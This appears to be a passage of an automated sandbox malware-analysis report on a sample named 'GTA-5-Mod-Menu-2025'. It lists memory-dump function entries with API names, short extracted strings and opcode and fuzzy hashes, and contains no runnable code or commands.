                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentExpandStrings
                                                                    • String ID: }{
                                                                    • API String ID: 237503144-1817783701
                                                                    • Opcode ID: 16afa918c6882dfd4e4bc712b4babfffb69efea80506a4196365dc12001641ed
                                                                    • Instruction ID: f0ec042841f28d150a08b660374878167d466067f4985ddf90ac37596e8225fb
                                                                    • Opcode Fuzzy Hash: 16afa918c6882dfd4e4bc712b4babfffb69efea80506a4196365dc12001641ed
                                                                    • Instruction Fuzzy Hash: DA7189B1A403208FD3158F9AC942BAABFB5FB55310F19926DD815AF792C778CC428BC5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AL$YZ$ZR$SA
                                                                    • API String ID: 0-278399133
                                                                    • Opcode ID: 17c7183413d10041a0133c4e25f34aea4590fa52c6808d476237fb28ecf8cd9d
                                                                    • Instruction ID: a58a268fd87ddbe2b0e6997e3312ee0df0e36ab0bdb19f87c0a900b7fd06fb42
                                                                    • Opcode Fuzzy Hash: 17c7183413d10041a0133c4e25f34aea4590fa52c6808d476237fb28ecf8cd9d
                                                                    • Instruction Fuzzy Hash: FBD13FB4C00B00ABD720AF39C9477977EB4EB05350F50465EE8EA9B385E33564598BE7
                                                                    APIs
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00423D83
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentExpandStrings
                                                                    • String ID: W${x
                                                                    • API String ID: 237503144-3671023368
                                                                    • Opcode ID: 786606c3dc092902752c1c498574fd258e7c035387cc116f078ff6fe03c28d13
                                                                    • Instruction ID: a5fd1ba5d2db3268e1939a6825d171a771d0ca1e0e6d89280d1a63628780965b
                                                                    • Opcode Fuzzy Hash: 786606c3dc092902752c1c498574fd258e7c035387cc116f078ff6fe03c28d13
                                                                    • Instruction Fuzzy Hash: 5D4113B2A103108BDB14CF66C9D276A3BB2FB45300F5981A8DD569F38AD779C942CBD4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$
                                                                    • API String ID: 0-32506980
                                                                    • Opcode ID: e8d1a0db1043de54b1b2344a254148f1aea362d8b84ce46076752b25d96364ad
                                                                    • Instruction ID: 970216d22e0e57e9067202e9ed210ba15d8fc61f54c70a19d2ee6af1056012c4
                                                                    • Opcode Fuzzy Hash: e8d1a0db1043de54b1b2344a254148f1aea362d8b84ce46076752b25d96364ad
                                                                    • Instruction Fuzzy Hash: AED17836B043009BD3149B25CC8172BF7A7EBD9314F29A52EF58597356CB78AC028B99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (vt$;z{x$~|
                                                                    • API String ID: 0-2255775517
                                                                    • Opcode ID: e1e35ac360842a9712e3830397a42e861688cc94bc8176bf4c61fe91c6be5d9c
                                                                    • Instruction ID: a2912b0b9e7d6d84f2484074f0585d3c7045b63e4963a885df20c5de1ca981e2
                                                                    • Opcode Fuzzy Hash: e1e35ac360842a9712e3830397a42e861688cc94bc8176bf4c61fe91c6be5d9c
                                                                    • Instruction Fuzzy Hash: 5BE1D0B4901B019FC321DF29C982663BFF1FF46310B148A5ED8D64BB55D334A866CB96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ACBBB19E4921B4981E3DEB35470B39C1$q$v
                                                                    • API String ID: 0-276898990
                                                                    • Opcode ID: b26a21a5819527a5cd816fafe1bec3b5ca4d7f9f0b344b900f9fd73f457edd91
                                                                    • Instruction ID: 2e467706338f15d38ca88fcf9c1edf598b493576a309fafa7b1392fefc59b62b
                                                                    • Opcode Fuzzy Hash: b26a21a5819527a5cd816fafe1bec3b5ca4d7f9f0b344b900f9fd73f457edd91
                                                                    • Instruction Fuzzy Hash: 1CD14772A183408BD314CF65C85176BBBE2EFD1304F14892EE4D19B392DB79D90ACB96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GKH$IJQ^$IM9F
                                                                    • API String ID: 0-2604729716
                                                                    • Opcode ID: fef0946c19b05084504d9099280d4db75fbd78642803dd6f2524cb5281737129
                                                                    • Instruction ID: 70e31edc7e30b7324b13001e2a5ca1b92760cc9fc6ead0f2dcce76324a3e6361
                                                                    • Opcode Fuzzy Hash: fef0946c19b05084504d9099280d4db75fbd78642803dd6f2524cb5281737129
                                                                    • Instruction Fuzzy Hash: 88416974600B419FE7258F35CC516A2BBA2FF97310F188698D0929F795C379E852CB88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: if$nl$zx
                                                                    • API String ID: 0-3024435305
                                                                    • Opcode ID: d84fde7f7387599ff90c571b96294a49ca71e4647e3a725b582a4970e8aa4ec6
                                                                    • Instruction ID: 57124a0ec9cee98ef9313d1ddb0ef3435ffc12f42a5085038e2807d673d1cc0f
                                                                    • Opcode Fuzzy Hash: d84fde7f7387599ff90c571b96294a49ca71e4647e3a725b582a4970e8aa4ec6
                                                                    • Instruction Fuzzy Hash: D331CB7461D3528AC314DF58C46163BB7F2EFD6300F24892DE895AB395E7389A11CB4E
                                                                    APIs
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,A909AF22,00000009,00000000,00000000,D160D766), ref: 00427FEE
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042816E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentExpandStrings
                                                                    • String ID:
                                                                    • API String ID: 237503144-0
                                                                    • Opcode ID: 2607c436665260f03eaf4a1c9a197b14ac76d6bef1e8c9fc12e883b964a0dcc7
                                                                    • Instruction ID: 17aaa8197d0553d2a673e825a4a1699ba9b46d490ee1a985ddd799fe4a462d88
                                                                    • Opcode Fuzzy Hash: 2607c436665260f03eaf4a1c9a197b14ac76d6bef1e8c9fc12e883b964a0dcc7
                                                                    • Instruction Fuzzy Hash: 677149B6E002105BEB18DF7CCC9276FBEB2EB85310F59817DE455AF385D93444028B91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: rs$IK
                                                                    • API String ID: 0-2158699859
                                                                    • Opcode ID: 0fd47706580c19ce44ff133b0c38231982e90c846a16c7a35b26ee127f9f342d
                                                                    • Instruction ID: 009500b8cdb8213b80d51384f6b2a9c6e3cd8f992beaf1bc88bd3c63b19eb604
                                                                    • Opcode Fuzzy Hash: 0fd47706580c19ce44ff133b0c38231982e90c846a16c7a35b26ee127f9f342d
                                                                    • Instruction Fuzzy Hash: 381201B560C3009BD710DF29D8916ABBBF1EFD6314F08896DE4C58B342E638D945CB9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xQB$
                                                                    • API String ID: 0-1821618924
                                                                    • Opcode ID: 6e27779c4a9eb3f5d654bca9240d60fd7e6136f8739c8312731d15b7afcecc9e
                                                                    • Instruction ID: 917d7035d1355f7ed64dd103f410a3797ffe51cb3d352abc7ec5bcd03244f16c
                                                                    • Opcode Fuzzy Hash: 6e27779c4a9eb3f5d654bca9240d60fd7e6136f8739c8312731d15b7afcecc9e
                                                                    • Instruction Fuzzy Hash: 2B12F075E00222CFDB14CF68D8916AEF7B2FF8A310F6A4569C941AB351D735AC42CB94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ()$UZRk
                                                                    • API String ID: 0-3133777487
                                                                    • Opcode ID: f553e5ec3553770c8f2cee49796cc0ffb552fa1e349475f8e08a655e073ebbd6
                                                                    • Instruction ID: 30318cc1521cf9abddd90c1628e95656b963a46a767071f44aef6809545d88c2
                                                                    • Opcode Fuzzy Hash: f553e5ec3553770c8f2cee49796cc0ffb552fa1e349475f8e08a655e073ebbd6
                                                                    • Instruction Fuzzy Hash: 0351117025C3809BD725CF34D8A53EBBBE1AFC6704F58886DD0D89B341CB39840A8B96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: KyB$X2g0
                                                                    • API String ID: 0-1002925558
                                                                    • Opcode ID: c5ac489e00a2ac72df77393b5453858d223e520e0a9a622bb9250be03b2c0532
                                                                    • Instruction ID: 7b23b1b79b845c0becc6db487958f2cfb21d9bfcb3c1090b9a6ac0bd44fbe49f
                                                                    • Opcode Fuzzy Hash: c5ac489e00a2ac72df77393b5453858d223e520e0a9a622bb9250be03b2c0532
                                                                    • Instruction Fuzzy Hash: FF0192B6B5C3208BD3158B19E89012BB3E2ABD9711F59492EE48567700C6749C428BCA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3019521637
                                                                    • Opcode ID: 7b63a8034375d2af04073a564af0f4f7adeb6574e979dac0ff1343cc3febc3ea
                                                                    • Instruction ID: ec2d05f2e51b1c7129bc03da390dadb612b87f3dd0570e39a2f303230a220cdf
                                                                    • Opcode Fuzzy Hash: 7b63a8034375d2af04073a564af0f4f7adeb6574e979dac0ff1343cc3febc3ea
                                                                    • Instruction Fuzzy Hash: AC224776A143009BD714CF28EC527ABB3A2EFC6314F09453DE4C197291EB78A945CB9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3019521637
                                                                    • Opcode ID: 548becee1886b8c87e52cdb0e57f839d16df8a2bd10ba8e3f3db48f357a77596
                                                                    • Instruction ID: 9ea381fbacc83f0afa8e4b59733c97f7d57f13874a88d60c0308fa3474373214
                                                                    • Opcode Fuzzy Hash: 548becee1886b8c87e52cdb0e57f839d16df8a2bd10ba8e3f3db48f357a77596
                                                                    • Instruction Fuzzy Hash: 0F0237B5E04215CFDB058F68EC916AEBBB1FF0B310F1941A9E841AB391D7395D01CB99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3019521637
                                                                    • Opcode ID: 19ee66d57beffd3cff7d3a33805b79e379e6887620b450d9281a454dc48cb3f8
                                                                    • Instruction ID: 325b2d32a275c1ced2308b6d38be9f416c4c37a5ba78286fb40102bc953f2477
                                                                    • Opcode Fuzzy Hash: 19ee66d57beffd3cff7d3a33805b79e379e6887620b450d9281a454dc48cb3f8
                                                                    • Instruction Fuzzy Hash: F5D13672B043208BD7148F25D89267BB3F1EFA1314F59952EE88697391E63CEC05879A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3019521637
                                                                    • Opcode ID: 64b162ade176055f92942673c7cfe488de403285e55cd6a84a745beca88a09d7
                                                                    • Instruction ID: db3a2ff2810daf0e2f6c41afe4a12a4da796e990cfad47177b4aaa730c14d7ba
                                                                    • Opcode Fuzzy Hash: 64b162ade176055f92942673c7cfe488de403285e55cd6a84a745beca88a09d7
                                                                    • Instruction Fuzzy Hash: 9AE148B5E04265CFDB108F68DC916AFB7B1FF46314F18416EE452AB392DB38A801CB59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: D]+\
                                                                    • API String ID: 2994545307-1174097187
                                                                    • Opcode ID: 244734e9967a5e56c90076f8537a2ab07a6bb37d36f90949d650e69cdb6aee1f
                                                                    • Instruction ID: 118c6c8d4040abb89e558249f621c867b47958a023dcf181e8174105492871de
                                                                    • Opcode Fuzzy Hash: 244734e9967a5e56c90076f8537a2ab07a6bb37d36f90949d650e69cdb6aee1f
                                                                    • Instruction Fuzzy Hash: ECA1497971A2009FD7089B29EC5177B73A2ABC6361F294A3DE0C1476A2DB349C818B5D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-3019521637
                                                                    • Opcode ID: e9a50bde0507edb5b470add06843d72d314ba5a95f27c5511c0e9a30e5930726
                                                                    • Instruction ID: cb99ef0ffeac7bebb980e6094653c27070be9b80b4795396c95ae866cd1300ca
                                                                    • Opcode Fuzzy Hash: e9a50bde0507edb5b470add06843d72d314ba5a95f27c5511c0e9a30e5930726
                                                                    • Instruction Fuzzy Hash: ED5148397152104BD7288B2ADC9177B73E29BC9320F2C8D3DD482E77A5CA389C518B49
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: qx
                                                                    • API String ID: 0-692295476
                                                                    • Opcode ID: fe89e3a02a11483ed6030c1b3b77a96d6762e4fc38c55a67123696f3cd43a987
                                                                    • Instruction ID: d4ebbf15c6dec44c84bcde361246c0b073cebca7473eaa8dec32d6046898dc33
                                                                    • Opcode Fuzzy Hash: fe89e3a02a11483ed6030c1b3b77a96d6762e4fc38c55a67123696f3cd43a987
                                                                    • Instruction Fuzzy Hash: 0A617875A027258BCB20CF65C8516BBB7B1FF56320F14864CD8966B3A5E738AC41CB98
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3019521637
                                                                    • Opcode ID: cc09146f7d5bc5ed23749e2c0ca925ab8fed4af4605a6bcd1cf5e5daf659ee4d
                                                                    • Instruction ID: 7bdbaa239a1eeda55115639878b0d123996512eadf8676db9d11d74afae2cef4
                                                                    • Opcode Fuzzy Hash: cc09146f7d5bc5ed23749e2c0ca925ab8fed4af4605a6bcd1cf5e5daf659ee4d
                                                                    • Instruction Fuzzy Hash: 2B614376608300ABD714DF25CC81B3BB7E2EBC9304F18882DF98497295DB79DC01879A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Z;X
                                                                    • API String ID: 0-326540526
                                                                    • Opcode ID: bac4a5be097188d45ea84bbed28c61b25c95dd5e22ed60a3e02fc0b15043aafa
                                                                    • Instruction ID: ee6cd8e2b8b0198342e0577d4339d529b05c218f00070a7ece456827257b0640
                                                                    • Opcode Fuzzy Hash: bac4a5be097188d45ea84bbed28c61b25c95dd5e22ed60a3e02fc0b15043aafa
                                                                    • Instruction Fuzzy Hash: CF5133B0A4C3108BD301DF55CC8226BB7F2EFD2344F08892DE4C55B351E639D9428B5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Z;X
                                                                    • API String ID: 0-326540526
                                                                    • Opcode ID: a10614e7ccd5132e8508c60fb38d8d4dee78fb05a2d2a0ca0fb3c01a97a0625a
                                                                    • Instruction ID: a7070b123745184f32c7e8021e83fcde3f52a5f996bbeb945e2206caacc5af02
                                                                    • Opcode Fuzzy Hash: a10614e7ccd5132e8508c60fb38d8d4dee78fb05a2d2a0ca0fb3c01a97a0625a
                                                                    • Instruction Fuzzy Hash: 0C5123B1A8C3108BD315DF55CC822ABB7F2EFD2348F08892DE4C55B351E639C9468B5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: v/#
                                                                    • API String ID: 0-2621095534
                                                                    • Opcode ID: 999fd48428407a1bcc05c500e686e739d52ee1ae81b2d434bd371b583955e88b
                                                                    • Instruction ID: ab4fdc6be8a7186e675a86437c2f1418d25c7775bc721b14dd0226c3e7f3ea3a
                                                                    • Opcode Fuzzy Hash: 999fd48428407a1bcc05c500e686e739d52ee1ae81b2d434bd371b583955e88b
                                                                    • Instruction Fuzzy Hash: 12515D7161C3D08BD7298B3898647FBBBE19FD7314F68896DC4DAC7291D63844068B46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =)
                                                                    • API String ID: 0-1770242605
                                                                    • Opcode ID: bb520702fe06ce013c974efa43d0f167fac707ccf224fb93477b583c3aa7d35f
                                                                    • Instruction ID: 9462df852d96577253bbae2f981200c1cf968b24f9cf993081faa8480b0089ac
                                                                    • Opcode Fuzzy Hash: bb520702fe06ce013c974efa43d0f167fac707ccf224fb93477b583c3aa7d35f
                                                                    • Instruction Fuzzy Hash: 3EF04C755081814BD7009B34ECA66FBB7D4CF63308F18093CD1C5D32A3EA349511865B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 36fd1aed37f9d0440d5ad80bec1e7fa74854c04ab0b490fabf46ac63e6d71548
                                                                    • Instruction ID: 85a75629312d86150f2b545a91db51e68025471b4eb8e95bfea53dbe2cb05d27
                                                                    • Opcode Fuzzy Hash: 36fd1aed37f9d0440d5ad80bec1e7fa74854c04ab0b490fabf46ac63e6d71548
                                                                    • Instruction Fuzzy Hash: 7B324879610A00DFDB258F25CC9067777E2EF9B310F1889ADD4D68B766CB34A881CB19
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40bf63cd71c07fb53522a215ca6e1361637acb4c75bb7a995d25c4e23e846dae
                                                                    • Instruction ID: 56d1f147cd060af2b7f7344e0d9e931e991897ba6981e263a57b0b04fb14db57
                                                                    • Opcode Fuzzy Hash: 40bf63cd71c07fb53522a215ca6e1361637acb4c75bb7a995d25c4e23e846dae
                                                                    • Instruction Fuzzy Hash: 4E22B232A087118BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7381D738B851CB47
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a00669c670d3003871b8140bf808ed1cd8b22db6a80ddb95f6d87f38655f937e
                                                                    • Instruction ID: 686053684b737d2ecc152786c79a2309da9fa9c5f8c4deb71dda74d38f3e75ae
                                                                    • Opcode Fuzzy Hash: a00669c670d3003871b8140bf808ed1cd8b22db6a80ddb95f6d87f38655f937e
                                                                    • Instruction Fuzzy Hash: 6DA13335A183119BC720DF28C88062BB7E2FF8D310F59983EE99597361D779AC45CB86
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 407652660b44c6792032eb5c382d1c016b43b61df4fe906baa70c74ae7b15fc1
                                                                    • Instruction ID: 31b0d93cc30ec3edebd44358e3b7e0d6a38ea81d195b51a1979558643ed22e82
                                                                    • Opcode Fuzzy Hash: 407652660b44c6792032eb5c382d1c016b43b61df4fe906baa70c74ae7b15fc1
